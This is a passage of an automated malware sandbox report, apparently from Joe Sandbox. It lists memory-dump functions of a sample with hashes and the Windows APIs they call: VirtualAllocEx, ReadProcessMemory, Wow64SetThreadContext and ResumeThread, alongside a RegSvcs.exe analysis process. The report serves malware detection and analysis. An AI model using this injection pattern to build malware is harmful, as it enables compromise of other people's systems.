Opcode Fuzzy Hash: d30dabe2c43229028df6189cee1840e3030e6142b9c9d86ca26221aacfad267b
Instruction Fuzzy Hash: B62139B1D003099FEB10DFAAC485BEEBBF4EF48314F148429D959A7240DB789945CFA4

Function 0730A7B0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0730A82E

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 527a426c5eb9b47b281b63fb730a3c0588cbc3d922c19bc60846f73a76d043dc
Instruction ID: 5010605cd2991154275caec49eede09814ac6eca64492f3e3e5d675e079503ea
Opcode Fuzzy Hash: 527a426c5eb9b47b281b63fb730a3c0588cbc3d922c19bc60846f73a76d043dc
Instruction Fuzzy Hash: 12213BB1D003099FEB10DFAAC485BEEBBF4EF88324F148429D559A7241DB789945CFA4

Function 0730AA38 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0730AAB8

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ffe8a5966498dddfa435d1a1004a9de0cabe4bab69bee149d07cb77551079112
Instruction ID: 10735b60e8bc4e7c921df893c3bcfaab27ffeee7daa2c804301077261f926200
Opcode Fuzzy Hash: ffe8a5966498dddfa435d1a1004a9de0cabe4bab69bee149d07cb77551079112
Instruction Fuzzy Hash: 4F2128B18003599FDB10DFAAC881ADEBBF5FF48310F148429E518A7240C7389550CBA4

Function 02B6D6B0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B6D737

Memory Dump Source

Source File: 00000000.00000002.2157532721.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 743b59dbdeaf517dca1adc207c9073fc4a6c5f423888806abc63107046a58475
Instruction ID: 5741e385d580cc8c24f7e1b1b13aa4109171962976ecb96302e84a31ea254b1a
Opcode Fuzzy Hash: 743b59dbdeaf517dca1adc207c9073fc4a6c5f423888806abc63107046a58475
Instruction Fuzzy Hash: F521F5B5900249DFDB10CFAAD984AEEFBF4FB48310F14845AE954A3310D378A950CFA5

Function 02B6D6A8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B6D737

Memory Dump Source

Source File: 00000000.00000002.2157532721.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d0115a05d50d1598d107c2df25e648c5458c5fd402b556d09617de2237c9b76a
Instruction ID: 255217a9a55f8c0b158db2a42c094a8d34497185ef6c8185a72c285e672ad280
Opcode Fuzzy Hash: d0115a05d50d1598d107c2df25e648c5458c5fd402b556d09617de2237c9b76a
Instruction Fuzzy Hash: 432103B5D00209EFDB10CFA9D984AEEBBF4EF48314F14841AE914A3310D338A950CF64

Function 02B6A150 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B6B099,00000800,00000000,00000000), ref: 02B6B2AA

Memory Dump Source

Source File: 00000000.00000002.2157532721.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dfd4da42f2c533553329ca55afdfa7eed4f17b4dd511bbe27e49ce2737812438
Instruction ID: c03b259f8be7bf33d3048ba582dca3575184981bf13320c46599c70d045011cb
Opcode Fuzzy Hash: dfd4da42f2c533553329ca55afdfa7eed4f17b4dd511bbe27e49ce2737812438
Instruction Fuzzy Hash: FE1114B69003499FDB10CF9AC848AEEFBF4EB88714F10846AD559B7200C379A545CFA4

Function 0730A882 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0730A8F6

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4c61f3f5e42cb784f0174218a1e1333728d9d99dea0b5809f6f8c63a14a189df
Instruction ID: 52d40fb7bc480e364cca8ab1aba982e5e6a6e62e1028fcdade2ccde988fa8174
Opcode Fuzzy Hash: 4c61f3f5e42cb784f0174218a1e1333728d9d99dea0b5809f6f8c63a14a189df
Instruction Fuzzy Hash: 0211567290034A9FEB20DFA9D845BEEBFF1EF88320F248819E519A7250C7359550CFA4

Function 02B6B239 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B6B099,00000800,00000000,00000000), ref: 02B6B2AA

Memory Dump Source

Source File: 00000000.00000002.2157532721.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1827744946f8a29c010dbb24b545da409ed3192a21652397588f8e176b08295d
Instruction ID: 6d814f1995a61d4cc684484eeacfc2e5a7c028509a29278cb1f0e7d4d8ba7b7a
Opcode Fuzzy Hash: 1827744946f8a29c010dbb24b545da409ed3192a21652397588f8e176b08295d
Instruction Fuzzy Hash: DE1117B68003499FDB10CF9AD844ADEFBF4EB48714F14845AD555A7200C379A545CFA4

Function 0730A888 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0730A8F6

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a2ef45128b75268e669383ea6008d0f1acc3c2f0f2238fae27f4d0bf598cab5a
Instruction ID: f5a6f829a490c0c2bdfce52b56c2d12b4992b3e7bf66003042f4c4803cb41df9
Opcode Fuzzy Hash: a2ef45128b75268e669383ea6008d0f1acc3c2f0f2238fae27f4d0bf598cab5a
Instruction Fuzzy Hash: A51137719003499FEB10DFAAD845BDFBBF5EF88320F248819E519A7250C7759550CFA4

Function 0730A6F8 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0730A762

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 95498eb0b8a4fc680b3037b66019a0f268d3ccc2a68cd172bc04c3e73f61f63c
Instruction ID: b482b9b1bf1577d6cbdac176f51950f3b58a484e511e4194d44c543cae10329a
Opcode Fuzzy Hash: 95498eb0b8a4fc680b3037b66019a0f268d3ccc2a68cd172bc04c3e73f61f63c
Instruction Fuzzy Hash: 181158B5C003498FEB20DFA9D5857EEBBF4AF88724F248819C159A7250CB399541CB94

Function 0730A700 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0730A762

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 383f46f6f49ffd76c92d61a990460d3fe5981b63c9e25738106d3186ed2943bf
Instruction ID: 0a8a848a48370b66678649076564231fa7526fc4975b9ec5c174cb34d454fba7
Opcode Fuzzy Hash: 383f46f6f49ffd76c92d61a990460d3fe5981b63c9e25738106d3186ed2943bf
Instruction Fuzzy Hash: 1B1128B19003498FEB20DFAAD44579EFBF4EF88624F248419D519A7240CB79A540CB94

Function 0730D2E4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0730F2BD

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6b1a119c74cfafd248093046ac4828565a449b6e63c966783be52cebe4801984
Instruction ID: 26e896c218ea6fb4c77322af0956b7de1a33e62afce1e8b17146dee0bee6a2b4
Opcode Fuzzy Hash: 6b1a119c74cfafd248093046ac4828565a449b6e63c966783be52cebe4801984
Instruction Fuzzy Hash: 6111F5B980074D9FDB20DF99D845BDEBBF8EB48314F108419E558A7240C375A944CFA5

Function 02B6AFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B6B01E

Memory Dump Source

Source File: 00000000.00000002.2157532721.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2a062972e36dd9b42f610b4500f0653ac22feee0bc09ec51bc9a62a0bc755b2a
Instruction ID: dabd8b7e31dc8c27ab38e593a21f488eca7c14747b5ce687719119b3454017b5
Opcode Fuzzy Hash: 2a062972e36dd9b42f610b4500f0653ac22feee0bc09ec51bc9a62a0bc755b2a
Instruction Fuzzy Hash: DA11DFB6C007498FDB20CF9AD448BDEFBF4EB88228F10845AD569B7210D379A545CFA5

Function 0102D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155766406.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_102d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aa3af7bddcc648c535f82ac2ffaa7486e494e17d985a5d9b50330bab44e757d
Instruction ID: c34e4223288d74d2e3599e49edbfbe2ed894fe145117fef498848d204fcac2c0
Opcode Fuzzy Hash: 0aa3af7bddcc648c535f82ac2ffaa7486e494e17d985a5d9b50330bab44e757d
Instruction Fuzzy Hash: EB212571504250DFDB05DF54D9C0B2ABFA5FB88318F20C6ADE9490B256C376D856CBA1

Function 0102D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155766406.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_102d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba73fefe6cf40b67dbc560db7b6e7fdb90537f9d424d1400222c34db9d644cf
Instruction ID: 42f1495d774216c724be1a7662cf625fe849c0cd6b8a993e15ed21944ec0ea03
Opcode Fuzzy Hash: 0ba73fefe6cf40b67dbc560db7b6e7fdb90537f9d424d1400222c34db9d644cf
Instruction Fuzzy Hash: 8E214571504204DFDB05DF44D9C0B5ABFA5FB88324F20C1ADE9490F256C736E846CBA1

Function 0103D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155974039.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_103d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee8a5348b59113dccc065ac52c826c17d3793ad47ee370c874f2b697760030b6
Instruction ID: b1b2d048e62ccbe7856f0607de9de40982fc57cc03abf53e0908598282357f68
Opcode Fuzzy Hash: ee8a5348b59113dccc065ac52c826c17d3793ad47ee370c874f2b697760030b6
Instruction Fuzzy Hash: EA214671504200EFDB01DF94D9C0B2ABBA9FBC4324F60C6ADE9894B292C336D446CB61

Function 0103D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155974039.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_103d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fdd4fc27bfc0e52daebc59b582b6a6bf3a106fb1618072c710eb28120d18d4a
Instruction ID: 301ff2156146168fec821f19481b1921b991f9fe6ff740b014d6234769b41b8d
Opcode Fuzzy Hash: 5fdd4fc27bfc0e52daebc59b582b6a6bf3a106fb1618072c710eb28120d18d4a
Instruction Fuzzy Hash: C0210071604200DFDB15DFA4D980B1AFBA9EBC4B14F60C5ADE98A4B292C33AD447CB61

Function 0103D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155974039.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_103d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d867312cde928e656d7a9698db6b62b5328773effa2684e02b08c7417d2924
Instruction ID: 2e3e3e9e6de1e0e203e35e5fcf934faced98ba7c9ef43b23916e8fa4f5049738
Opcode Fuzzy Hash: 11d867312cde928e656d7a9698db6b62b5328773effa2684e02b08c7417d2924
Instruction Fuzzy Hash: 062183755083809FCB02CF64D994711BFB5EB86214F28C5DAD8898F2A7C33A9816CB62

Function 0102D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155766406.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_102d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction ID: cb5e088ba45b9a3a235c574d507cf9a9e71f865fe17aa2ea4321dd5362c60dfe
Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction Fuzzy Hash: D6110372404280CFDB02CF44D9C0B56BFB1FB84324F24C2A9D8490B257C33AE856CBA1

Function 0102D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155766406.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_102d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction ID: dd100f5b1bae50cd2a875d626dd681c993ff94bfb08c6de623ce8d59eb492e25
Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction Fuzzy Hash: 6311E172404280CFCB02CF54D5C0B16BFB1FB84318F24C6A9D8490B257C33AD856CBA1

Function 0103D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155974039.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_103d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
Instruction ID: ea7250bc50a64b89b192e05e37506350940c499df8c65f059cba6a12af374c49
Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
Instruction Fuzzy Hash: 7411BB75504280DFCB02CF54C5C0B15BBA1FB84224F24C6A9D8894B297C33AD40ACB61

Function 0BEF0C98 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164758778.000000000BEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bef0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4e0569e8953d2e6d6ab3fa1e7e284ccf912cb44f8b875a2e05d4d0103626a6
Instruction ID: 0aeea401ed695f6237250ee00ec3e83c10a1a995e22c0c71e8b428e4e07255d5
Opcode Fuzzy Hash: db4e0569e8953d2e6d6ab3fa1e7e284ccf912cb44f8b875a2e05d4d0103626a6
Instruction Fuzzy Hash: 19F02E5135E213C7D6050E55D6112FD196669C0D023143157CF37AF647ED2E88065363

Function 0BEF0CA8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164758778.000000000BEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bef0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f5c592bda085f891a6edf3432b578951edc6a487e0d233bdc27c4ba96cd5b77
Instruction ID: 2866a30f941faa70a88eae5c6e162e90ddf6dd7b46f1c76e4af65033d139778a
Opcode Fuzzy Hash: 5f5c592bda085f891a6edf3432b578951edc6a487e0d233bdc27c4ba96cd5b77
Instruction Fuzzy Hash: 62F0922135D127C355151E5AE6401FE25AAB9C0E067543117DF37AB747EE7FC80292A3

Non-executed Functions

Function 0BEF1118 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164758778.000000000BEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bef0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c895da986b7388f3e016b2527b425f6b711d28f648a7770f92ca92ebd54ea6a5
Instruction ID: e6c06498cfc1aa8cb0ee2266c7bcc9a1cbc3a209ab802e09af1160109ff21180
Opcode Fuzzy Hash: c895da986b7388f3e016b2527b425f6b711d28f648a7770f92ca92ebd54ea6a5
Instruction Fuzzy Hash: A1D1BE31B0120A8FDB15DB75C8607AE77FBAF89704F1484A9C246EB691DF35E901CB52

Function 07309668 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5166fb98b9d41a366c2f04117b08679aa467b1efb515beb9e9917bdbe367e3
Instruction ID: 747e0c7062f761d4fd19edf6dbfa70f487e5641e836f46d672650b17e63b662c
Opcode Fuzzy Hash: bf5166fb98b9d41a366c2f04117b08679aa467b1efb515beb9e9917bdbe367e3
Instruction Fuzzy Hash: 56E10DB4E002198FDB54DFA9C590AAEFBF2FF89305F248159D419AB356D730A941CFA0

Function 07307E60 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bae78335bcda72ffd5b70349f215162dad7b83e7dbd380c913416800cb1d17f
Instruction ID: 731021ea81e75decd9f949bec6cdc008ad62abdab215f7617b7698c7f814ea05
Opcode Fuzzy Hash: 2bae78335bcda72ffd5b70349f215162dad7b83e7dbd380c913416800cb1d17f
Instruction Fuzzy Hash: A6E11DB4E006198FDB14DFA9C590AAEFBF2FF89305F248159D418A7356D730A942CFA1

Function 07309ED8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 492fbd2329fc29e4a8514f02537306524de9913a1938667280a2f47e57d305c6
Instruction ID: d1272702b016731f75e88d4e401acca173ab9edeca70f9857af4b676be1111f5
Opcode Fuzzy Hash: 492fbd2329fc29e4a8514f02537306524de9913a1938667280a2f47e57d305c6
Instruction Fuzzy Hash: B9E1FDB4E002198FDB14DFA9C590AAEFBF2FF89305F248169D418A7356D731A941CFA1

Function 07307A28 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30837715e5c8ca4bcfb6706103a4d4345d67b99620c33aa09c9f805665ee17cc
Instruction ID: 5c8ac5ddb361d073c34ed24470c2a0330e23d16fd7155fe1463f01d7aa74a232
Opcode Fuzzy Hash: 30837715e5c8ca4bcfb6706103a4d4345d67b99620c33aa09c9f805665ee17cc
Instruction Fuzzy Hash: 15E1FCB4E002198FDB14DFA9C590AAEFBF2BF89305F248169D458A7355D731AD41CFA0

Function 07309AA0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e37b1acb75da610e490a333f63617cd2c17373e5482f21ac57470348fbec81
Instruction ID: 860afea7c11301feb1af430f26b2d63cf600a51a1a14f0f0751b0eb15515634b
Opcode Fuzzy Hash: 06e37b1acb75da610e490a333f63617cd2c17373e5482f21ac57470348fbec81
Instruction Fuzzy Hash: 62E10CB4E002198FDB14DF99C590AAEFBF2BF89305F248159D458AB356D730AD41CFA0

Function 073003F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063f6969538fe036d2b50b7c256b688bc35f76f45fa388108d47f922a0e4e93a
Instruction ID: 2c40f59ace1b13f9c03f7dd12d48397993d09b8cfff343d73ff524141ffa6714
Opcode Fuzzy Hash: 063f6969538fe036d2b50b7c256b688bc35f76f45fa388108d47f922a0e4e93a
Instruction Fuzzy Hash: 2AD1FB31910B5ACACB00EB64D99069DB7B1FFD5300F10C79AE5493B210EF706AC9CB91

Function 07300400 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9fd40e8c8440b9329e1b9661af7e66f22e1dd30948253584f47c5cafb3458a
Instruction ID: 33dafe625ce3f81dbb0fd37af0b0c45e696f780e62bfd6d9c7d407396d92ee41
Opcode Fuzzy Hash: ec9fd40e8c8440b9329e1b9661af7e66f22e1dd30948253584f47c5cafb3458a
Instruction Fuzzy Hash: 54D1EA31920B5ACACB10EB64D99069DB7B1FFE5300F10C79AE5493B214EF706AC9CB91

Function 02B6D5DC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157532721.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db91686bf096fb23c5eed31da3de00afd7a9951845e32e9d87edaebee8defbd2
Instruction ID: b68f0c3a67c83bbf224960d9a8484b25ca966bdc8b8f64aa4198be31c63c61df
Opcode Fuzzy Hash: db91686bf096fb23c5eed31da3de00afd7a9951845e32e9d87edaebee8defbd2
Instruction Fuzzy Hash: 29A16D36E002098FCF05DFB5D8485BEBBB2FF85304B1585AAE806AB265DB35E955CF40

Function 07309658 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b06061342548ae68925f3f8b29e5b514a505cde50a2ed87dfb3d8765fda0cc
Instruction ID: c7a0c81eb3ddcae4b65cebc7224e71d13445904c8bbea8223671545a2b1f800f
Opcode Fuzzy Hash: d0b06061342548ae68925f3f8b29e5b514a505cde50a2ed87dfb3d8765fda0cc
Instruction Fuzzy Hash: 056164B5E042598FDB14CFA9C5546AEFBF6FF89300F14816AD408AB356D730A942CFA1

Function 07309A90 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80d03bde8f78da779445d4d0538990ace831abc280fd1c027e419a7ab4f9c7bf
Instruction ID: ca9e4c6f7d84856ab415a062d574d4f67b2878e7aa913b1e5db3b53590316f32
Opcode Fuzzy Hash: 80d03bde8f78da779445d4d0538990ace831abc280fd1c027e419a7ab4f9c7bf
Instruction Fuzzy Hash: FF512DB5E102198FDB14DFA9C5906AEFBF2BF89304F24C169D448A7356D730A942CFA1

Analysis Process: RegSvcs.exePID: 6112, Parent PID: 6316COMMON

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	52.6%
Total number of Nodes:	38
Total number of Limit Nodes:	3

Executed Functions

Function 01172B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011A0DBD,?,?,?,?,01194302), ref: 01172B6A

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

